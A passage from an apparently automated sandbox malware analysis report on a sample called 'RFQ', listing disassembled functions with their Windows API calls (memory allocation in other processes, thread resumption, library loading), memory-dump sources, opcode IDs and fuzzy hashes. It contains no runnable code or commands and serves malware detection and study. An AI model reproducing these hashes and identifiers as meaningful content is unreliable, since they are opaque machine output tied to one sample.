                                                                                                        • Instruction Fuzzy Hash: AE2114B1D007498FDB10DFA9C885AEEFBF5FF48310F10882AE959A7250CB389545CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0122DE20 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0122DEA7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        • Opcode ID: e03d8354b46940ddaafcf9e54d6c265aae3e3cdcf82b23cdfdc9448727799c3c
                                                                                                        • Instruction ID: e24b3b1552c5bf737adcb36e29df8c5f66baa11c8f3c101de6c5996ed8e2bf3f
                                                                                                        • Opcode Fuzzy Hash: e03d8354b46940ddaafcf9e54d6c265aae3e3cdcf82b23cdfdc9448727799c3c
                                                                                                        • Instruction Fuzzy Hash: AB21C4B5900259AFDB10CF9AD984ADEFFF9FB48310F14841AE918A3350D378A944CFA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B8058 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077B80CE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: e436a7f16fa6c956a2296d306023ff0777e493532d6bef264578c94da77392b3
                                                                                                        • Instruction ID: 11a24f9ab6042d02ac2bf27fe0898bbaad0b99627720ed928a4a25b67817bb60
                                                                                                        • Opcode Fuzzy Hash: e436a7f16fa6c956a2296d306023ff0777e493532d6bef264578c94da77392b3
                                                                                                        • Instruction Fuzzy Hash: 73114A719006099FCB10DF99C845BDFFFF5EF88310F14881AE519A7250C7759544CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0122AC18 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0122BEF9,00000800,00000000,00000000), ref: 0122C10A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 1029625771-0
                                                                                                        • Opcode ID: ab3b786d9c3e9132f021d8d423c467c952c68e1928d60881b8fd59fffd9c0346
                                                                                                        • Instruction ID: 8c28d57071bb66cb97d6241d770dbbd72ea65a13994ab6bd822ea0ea43edaba5
                                                                                                        • Opcode Fuzzy Hash: ab3b786d9c3e9132f021d8d423c467c952c68e1928d60881b8fd59fffd9c0346
                                                                                                        • Instruction Fuzzy Hash: 271114B69002199FDB10DF9AC444ADEFBF4EB89310F10842AE519A7200C379A545CFA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B8060 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077B80CE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: ae169bec4ef2bf6a678631699ebee04a9a4feb10bf7bd31f5cfaefaaa82116f2
                                                                                                        • Instruction ID: 177239fa9439059ab80e5e6566338384bd3f9ef53568fdb8b2c91c5a08f3d03a
                                                                                                        • Opcode Fuzzy Hash: ae169bec4ef2bf6a678631699ebee04a9a4feb10bf7bd31f5cfaefaaa82116f2
                                                                                                        • Instruction Fuzzy Hash: 4C1126B19002499FCB20DFAAC844BEFFBF5EF88310F10881AE519A7250C779A544CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B7668 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: c4df6c0f7f1f34260783b5987a367af99917d655c741ea0224c35ec98a136106
                                                                                                        • Instruction ID: 9ace002394ba2cd9ea32ef6ad84b1e431bb5c694e484259f5d8874ba9afb5119
                                                                                                        • Opcode Fuzzy Hash: c4df6c0f7f1f34260783b5987a367af99917d655c741ea0224c35ec98a136106
                                                                                                        • Instruction Fuzzy Hash: B4113AB1D002498FCB24DFAAC4457EEFBF5EF88314F20881AD519A7250CB79A544CBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B7661 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        • Opcode ID: 0f1927b2a454942b1a0492daba59244fbff402390ae4ba697756fd520a570dc1
                                                                                                        • Instruction ID: 0810474d61d41e7e033b8fd85328dd4bef9dd3f2dab8f1cefc15fd324fd46f63
                                                                                                        • Opcode Fuzzy Hash: 0f1927b2a454942b1a0492daba59244fbff402390ae4ba697756fd520a570dc1
                                                                                                        • Instruction Fuzzy Hash: 5E1128B5D002098FDB14DFAAC4457EEFBF5EF88314F20881AD51AA7250CB39A545CF94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077BC610 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 077BC675
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: fe9face2c853536a88bad4b74933d9646db1812b4e3902124388e34eff81cbef
                                                                                                        • Instruction ID: 573242e29b48c446d56de59063d1b53e62c87514dd835a4b282a11ff6f140395
                                                                                                        • Opcode Fuzzy Hash: fe9face2c853536a88bad4b74933d9646db1812b4e3902124388e34eff81cbef
                                                                                                        • Instruction Fuzzy Hash: 8811F5B58003499FDB10DF99C945BDEFFF8EB49314F10881AE519A7210C379A544CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 077B6514 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 077BC675
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        • Opcode ID: c76cca4dc167f61dfbf71cb8f04c67bf8880d86c645b9af760623e3ebcf80b55
                                                                                                        • Instruction ID: 2b4aff72b5ab67cd208c3ccbde990637debb72dd7fae1de15c5983fb3f14e272
                                                                                                        • Opcode Fuzzy Hash: c76cca4dc167f61dfbf71cb8f04c67bf8880d86c645b9af760623e3ebcf80b55
                                                                                                        • Instruction Fuzzy Hash: 8511F5B58003499FCB20DF9AC949BDEFBF8EB48314F10881AE518A7211C375A944CFA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0122BA18 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0122BA7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: 6e4836d5ab58403e6ef569082bbf8c14832b47fa6adb5cd9c9e3d55b19cc1649
                                                                                                        • Instruction ID: 415139e1ab1b4c1574c8dbfe8e7561aa693788121b458b7444b716e7b0c09746
                                                                                                        • Opcode Fuzzy Hash: 6e4836d5ab58403e6ef569082bbf8c14832b47fa6adb5cd9c9e3d55b19cc1649
                                                                                                        • Instruction Fuzzy Hash: D01110B6C007498FDB20CF9AC444ADEFBF4EF88310F10841AD529A7210C379A545CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072FC4F8 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PH]q
                                                                                                        • API String ID: 0-3168235125
                                                                                                        • Opcode ID: 8dfc12c0d836efb4c4c562833e7ca822b5d94af001bd1564107ceccf99b13982
                                                                                                        • Instruction ID: d9ed0a7e9103f3bb2984d6f10a245847f4696b049258b2247829aba1b12aba73
                                                                                                        • Opcode Fuzzy Hash: 8dfc12c0d836efb4c4c562833e7ca822b5d94af001bd1564107ceccf99b13982
                                                                                                        • Instruction Fuzzy Hash: 77A1C1B5B1021A8FDB18DF68C954AA9B7F6FF89310F1445B9D505AB3A1CB34DC81CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 07406268 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Te]q
                                                                                                        • API String ID: 0-52440209
                                                                                                        • Opcode ID: 1a8b1355a51fc0c014d3c87bdffe4619ff26938d37f1fe8e50dfb6fb7682bf7d
                                                                                                        • Instruction ID: 9fb83d531c257c61545229b3c85979ad3888bf3a103fe57ed7e68a0928795698
                                                                                                        • Opcode Fuzzy Hash: 1a8b1355a51fc0c014d3c87bdffe4619ff26938d37f1fe8e50dfb6fb7682bf7d
                                                                                                        • Instruction Fuzzy Hash: 46113D71B0021A8BCB04EFB999105EFB6B6ABC4611B11407AC50AE7384EB358912CBE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0740409D Relevance: .2, Instructions: 161COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a34562c7cad8d24cd9e1b79cf97aad90646746a803b498163bb639068463ad9
                                                                                                        • Instruction ID: 12b92ea69915cb070ed5f7c1067a042e1088e5a039972341fea9a4eecc61c27f
                                                                                                        • Opcode Fuzzy Hash: 2a34562c7cad8d24cd9e1b79cf97aad90646746a803b498163bb639068463ad9
                                                                                                        • Instruction Fuzzy Hash: FA41947715C194DED312CBB4E4899E17FA0EF0262172A95ABD1DACA862DA349007CBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0740EE30 Relevance: .1, Instructions: 149COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 621d40955e44b745f522e657e3d928c99d7889a1ed02d5c6babfb5e7786d76f1
                                                                                                        • Instruction ID: 8b87fe9316b7a06b928e3613751f5689768dc075c785acd809cfc1e2efe6618c
                                                                                                        • Opcode Fuzzy Hash: 621d40955e44b745f522e657e3d928c99d7889a1ed02d5c6babfb5e7786d76f1
                                                                                                        • Instruction Fuzzy Hash: 714191B1B003599FCB54AFA984546AFBBE6EBC4210F10886AE605D7381DF34DD468BE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0740AF00 Relevance: .1, Instructions: 142COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0228cbb81ce927a3134fd54c0e39bbbbf7fb8a5018a76f99e84c2d896f9e114d
                                                                                                        • Instruction ID: 0667dd2911db2c56fec2c5d2c30bc21d5417908ad461123d189024c428db6738
                                                                                                        • Opcode Fuzzy Hash: 0228cbb81ce927a3134fd54c0e39bbbbf7fb8a5018a76f99e84c2d896f9e114d
                                                                                                        • Instruction Fuzzy Hash: 0051C0F1A15316CFC7018BA9C940AEABBF5FF46204F14857BD0A5DB282D7399942CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072F1894 Relevance: .1, Instructions: 137COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 42cc2b1b59d129e305fd6492a2361ce64f0e80442db818d6f61be8d617157843
                                                                                                        • Instruction ID: 6e2217cba30a3b213817f2383c8c986aa46cdc0622669b53890fe117403be95e
                                                                                                        • Opcode Fuzzy Hash: 42cc2b1b59d129e305fd6492a2361ce64f0e80442db818d6f61be8d617157843
                                                                                                        • Instruction Fuzzy Hash: D851B0713206069FC7149F28D8A4A6AB7E6FF85310F108639E60ACB365DF71EC46CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0740DBC8 Relevance: .1, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0327e958b5b40f7607178027c0033eb085ceee14db15b2581839a387f8cf8fa4
                                                                                                        • Instruction ID: 6cc1ee98c768c143de2660ada96d87452fe5971414131c4472f14905275d4ff5
                                                                                                        • Opcode Fuzzy Hash: 0327e958b5b40f7607178027c0033eb085ceee14db15b2581839a387f8cf8fa4
                                                                                                        • Instruction Fuzzy Hash: 76419DB5E002199FDB04CFA9D884AEEBBF2BB49300F14846AD819E7345E7749A45CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0740B6E0 Relevance: .1, Instructions: 117COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c6e4167acdd0bda6c663bad2d17ef6f6ac6cb776fdc373d8416c1d5938a50bb
                                                                                                        • Instruction ID: 4bb098ed3c3ae4680979c0ba0133e3570d3f10003825a150f639aa8478a9e69c
                                                                                                        • Opcode Fuzzy Hash: 7c6e4167acdd0bda6c663bad2d17ef6f6ac6cb776fdc373d8416c1d5938a50bb
                                                                                                        • Instruction Fuzzy Hash: B341F8F4E25219DFCB00CFA9E8888EEBBB4FB4E300F005866D456A7351D7309815CBA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 07408090 Relevance: .1, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d010f8c457b1769ee1013b598cd329ad1457d881aedf3bb0be9de8250111eac1
                                                                                                        • Instruction ID: 4f92968654ff9100d8fa8ec091ea7eb56d7754a17ccd24e1f91727ff66247b08
                                                                                                        • Opcode Fuzzy Hash: d010f8c457b1769ee1013b598cd329ad1457d881aedf3bb0be9de8250111eac1
                                                                                                        • Instruction Fuzzy Hash: AF4180B0915209DFCB04DFE4C6559AEBBB6FF40704F15C8AAC0222B7A5D735C985CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 07406348 Relevance: .1, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 687fc95346e9736a020a9695d49bec4b377f2b4c080df096efb4ef2d7f793bda
                                                                                                        • Instruction ID: dec1e83c66c11aadf9a74ea0aedfdfa979f3beaab56d10150b49426e1581b8a3
                                                                                                        • Opcode Fuzzy Hash: 687fc95346e9736a020a9695d49bec4b377f2b4c080df096efb4ef2d7f793bda
                                                                                                        • Instruction Fuzzy Hash: 7031A175B102158FCB14EB7998548BFBBFAEFC9220755452DE51AD7380DE30DC028B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 074040FB Relevance: .1, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4ad7b11336e94fcdd840d3c2d0cae36cd0b261ce2a1b4fa6db9a22e5f618da0e
                                                                                                        • Instruction ID: 99873035c6b1286dbd68a3d780d4ec94c12e5d3de81e6d0fee5bcb2486ddd025
                                                                                                        • Opcode Fuzzy Hash: 4ad7b11336e94fcdd840d3c2d0cae36cd0b261ce2a1b4fa6db9a22e5f618da0e
                                                                                                        • Instruction Fuzzy Hash: 272190761082E4DED712CBB8D4899E17FA0EB1262172E91EBD5DACFC63D6249007CBC0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 07407A80 Relevance: .1, Instructions: 94COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 58f6063e37d9d8cddffd09eaa808a1a4bddc7ddd6547ab21cff1078ce95f576f
                                                                                                        • Instruction ID: 5dbf9e8c6f758dbd2c098b98e94e294a70d4ea519600942c6399117aa1a75fcc
                                                                                                        • Opcode Fuzzy Hash: 58f6063e37d9d8cddffd09eaa808a1a4bddc7ddd6547ab21cff1078ce95f576f
                                                                                                        • Instruction Fuzzy Hash: 2531E471A00205DBDB119FA5C9407B6FBB2BF85308F14C9BAD4189B382D736E856C7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0740E760 Relevance: .1, Instructions: 88COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6ffb2fdcb611aadeecd6df2959da6eafd1368415c3c1771c8df88dbbecead864
                                                                                                        • Instruction ID: 60eb9bb61bb16fef65c8a0d626c04155820de286bf24599ee0bf26d428ccbf97
                                                                                                        • Opcode Fuzzy Hash: 6ffb2fdcb611aadeecd6df2959da6eafd1368415c3c1771c8df88dbbecead864
                                                                                                        • Instruction Fuzzy Hash: 693100B1909264DBC710EBA9C6846BEB7B0EB42301F408D7BD522DB2D1D334D9A2CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 072FED00 Relevance: .1, Instructions: 83COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2c9db4bdda77c7ebbb7390acbaae195809de75bc0c6b2aa3150537e13296ed82
                                                                                                        • Instruction ID: d57c7390c7b8196731bebffb18746dba907c9045430883a49826a14d7c3f1e71
                                                                                                        • Opcode Fuzzy Hash: 2c9db4bdda77c7ebbb7390acbaae195809de75bc0c6b2aa3150537e13296ed82
                                                                                                        • Instruction Fuzzy Hash: F42128B1B117118BC7299B7A951062EBAEADFC5210B49857FC10A87BA0DE759802CB15
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ECD4C4 Relevance: .1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2007760194.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ecd000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 92f9646ab46f59ef4921bd089c6f115f4867a49b40ba970026c19eac244118e0
                                                                                                        • Instruction ID: 00ee86d72ca19fe73b89f16cc31336e595b8ef825779eb38bb45c194bfddd7ce
                                                                                                        • Opcode Fuzzy Hash: 92f9646ab46f59ef4921bd089c6f115f4867a49b40ba970026c19eac244118e0
                                                                                                        • Instruction Fuzzy Hash: D621ED72508240DFCB05DF14DA80F26BF65FB98328F20857DE9091A256C33BD816DAA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00ECD3D8 Relevance: .1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2007760194.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ecd000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a072ad9e6ed592f2c1162f38b1fdb33522691b2aac96a2b08cbafecbe6a9c6df
                                                                                                        • Instruction ID: e660113d9f93fd4d9a91b958012a9eef4718692135b9c4bedfe5835477184d14
                                                                                                        • Opcode Fuzzy Hash: a072ad9e6ed592f2c1162f38b1fdb33522691b2aac96a2b08cbafecbe6a9c6df
                                                                                                        • Instruction Fuzzy Hash: 5521D171508204DFDB09DF14DAC0F26BB65FB98324F20857DDA095A256C33BE857D6A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0740AC70 Relevance: .1, Instructions: 74COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c42d9709806b52162ceaa25df599ac8ea5042666507689bd43e143d0be6ac2a3
                                                                                                        • Instruction ID: 8f033bc45042210f12ab5af470393c68837611737d68486569905486517ad90c
                                                                                                        • Opcode Fuzzy Hash: c42d9709806b52162ceaa25df599ac8ea5042666507689bd43e143d0be6ac2a3
                                                                                                        • Instruction Fuzzy Hash: 932180F1B183299BD7108E6998405FBB7A5BB46611F02CA3BE822D7381E3348D41C7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0740FBF0 Relevance: .1, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
